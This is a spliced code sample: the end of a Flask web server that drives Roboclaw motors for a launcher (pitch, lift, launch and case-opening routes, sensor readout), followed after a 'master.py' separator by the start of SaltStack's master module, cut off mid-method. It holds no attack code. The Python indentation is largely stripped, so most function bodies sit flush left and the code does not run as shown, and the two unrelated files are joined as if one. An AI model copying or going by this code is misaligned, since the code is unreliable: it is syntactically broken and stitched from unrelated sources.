## launch_increment = launch_objective-launch_actual+launch_connect
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
pass
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
## rc.ForwardM2(address_2,0)
## event.clear()
## return (''), 204
pass
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_case_open', methods=['POST'])
def function_case_open():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
else:
## rc.ForwardM1(address_3, 127)
## rc.ForwardM2(address_3, 127)
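        #SpeedDistanceM1M2 arguments (per the Roboclaw API): address, speed M1, pulses M1, speed M2, pulses M2, buffer (1 = execute immediately)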
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1)
return (''), 204
@app.route('/app_case_close', methods=['POST'])
def function_case_close():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
else:
## rc.BackwardM1(address_3, 50)
## rc.BackwardM2(address_3, 50)
rc.SpeedDistanceM1M2(address_3, -500, 6000, -500, 6000, 1)
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
event.clear()
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
    encoders_ready = 1 #Mark encoders as ready (note: the ResetEncoders calls above are currently commented out)
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
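    #ReadMainBatteryVoltage reports tenths of a volt, hence the 0.1 scaling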
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/measurements', methods=['GET'])
def data_display():
'''
    This function gets the data from the gyroscope and the temperature sensor and sends them to the web page
'''
# threading.Thread(target = thermo.portread_loop, daemon = False).start()
try:
temp = thermo.read_temp()
except:
temp = 'NaN'
try:
x_rotation = MPU9250.gyro_data()[0]
except:
x_rotation = 'NaN'
try:
y_rotation = MPU9250.gyro_data()[1]
except:
y_rotation = 'NaN'
try:
angle = MPU9250.gyro_data()[2]
except:
angle = 'NaN'
try:
gyro_temp = MPU9250.gyro_data()[3]
except:
gyro_temp = 'NaN'
try:
cpu_temp = MPU9250.gyro_data()[4]
except:
cpu_temp = 'NaN'
return jsonify(temperature=temp,x_rotation=x_rotation,
y_rotation=y_rotation, angle=angle,
gyro_temp=gyro_temp, cpu_temp=cpu_temp)
#Don't forget to add the return variables
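#Illustrative response for GET /measurements (values made up):
#  {"temperature": 24.1, "x_rotation": 0.3, "y_rotation": -0.1,
#   "angle": 12.5, "gyro_temp": 25.0, "cpu_temp": 48.2}
#with the string "NaN" substituted for any sensor that could not be read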
@app.route('/app_stop', methods=['POST'])
def function_stop():
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
## rc.ForwardM2(address_2,0) # STOP Launcher
rc.ForwardM1(address_3, 0)
rc.ForwardM2(address_3, 0)
event.clear()
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
## print ('STANDBY MODE')
## colorWipe(strip, Color(255, 255, 255))
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1) #Open case
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_break
## launch_actual = launch_connect
## launch_increment = launch_objective-launch_actual
## rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## event.clear()
## return (''), 204
pass
@app.route('/app_mount', methods=['POST'])
def function_mount():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
# Automatic launch works, but it is disabled because the while loop prevents
# the motors from stopping when the Stop button is pressed, making it dangerous
##@app.route('/app_automatic_launch', methods=['POST'])
##def function_automatic_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
##
## #Prepare
## if pitch_ready == 0:
## pitch_objective = 0
## else:
## pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## if lift_ready == 0:
## lift_objective = 0
## else:
## lift_objective = int(lift_pulses/(lift_length/lift_ready))
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_1 = (0,0,0)
## buffer_2 = (0,0,0)
## while(buffer_1[1]!=0x80): #Loop until pitch is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_1[2]!=0x80): #Loop until rotation is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_2[1]!=0x80): #Loop until lift is completed
## buffer_2 = rc.ReadBuffers(address_2)
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Launch
## launch_objective = launch_break
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## rc.SpeedDistanceM2(address_2,launch_speed_pulses,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Standby
## pitch_objective = 0
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## lift_objective = 0
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## return (''), 204
'''THE FOLLOWING 'ROUTES' HAVE BEEN DECOMMISSIONED FOR THE TIME BEING SO THAT NO VARIABLES CAN BE AMENDED FROM THE GUI'''
##@app.route('/app_change_pitch', methods=['POST'])
##def function_change_pitch():
## pitch_position_prepare = request.form.get('pitch_position_prepare', type=int)
## if pitch_position_prepare > pitch_length or pitch_position_prepare < 0:
## return (''), 400
## global pitch_ready
## pitch_ready = float(pitch_position_prepare)
## return (''), 204
##
##@app.route('/app_change_lift', methods=['POST'])
##def function_change_lift():
## lift_position_prepare = request.form.get('lift_position_prepare', type=int)
## if lift_position_prepare > lift_length or lift_position_prepare < 0:
## return (''), 400
## global lift_ready
## lift_ready = float(lift_position_prepare)
## return (''), 204
##
##@app.route('/app_change_rotation', methods=['POST'])
##def function_change_rotation():
## rotation_position_prepare = request.form.get('rotation_position_prepare', type=int)
## if rotation_position_prepare > rotation_length or rotation_position_prepare < 0:
## return (''), 400
## global rotation_ready
## rotation_ready = float(rotation_position_prepare)
## return (''), 204
##
##@app.route('/app_change_speed', methods=['POST'])
##def function_change_speed():
## speed = request.form.get('speed', type=int)
## if speed > launch_max_speed or speed < launch_min_speed:
## return (''), 400
## global launch_speed_pulses
## global launch_acceleration
## if speed > 7:
## launch_speed_pulses = speed*13400
## launch_acceleration = 655360 #Maximum value
## return (''), 204
## else:
## launch_speed_pulses = speed*13400
## launch_acceleration = (launch_speed_pulses**2)/13400
## return (''), 204
##
##@app.route('/app_change_acceleration', methods=['POST'])
##def function_change_acceleration():
## acceleration = request.form.get('acceleration', type=int)
## if acceleration > launch_max_acceleration or acceleration < launch_min_acceleration:
## return (''), 400
## acceleration = acceleration*13400
## global launch_acceleration
## launch_acceleration = acceleration
## return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
# Testing having the lights and temperature as a part of the backend code
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
try:
strip.begin()
except RuntimeError:
print("ws2811_init failed with code -5 (mmap() failed)")
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("'strip is not defined'")
##print ('STANDBY MODE')
#For starting the thread when booting
event = Event()
Thread(target=relay_activate).start()
if __name__ == "__main__":
try:
app.run('localhost',port=5000, debug=False)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
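#To use (assumed workflow): run this script on the launcher's controller, then open
#http://localhost:5000/ in a browser to reach the control page rendered by index()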
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server; this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
    Create a simple salt-master; this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
        Rotate the AES key
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
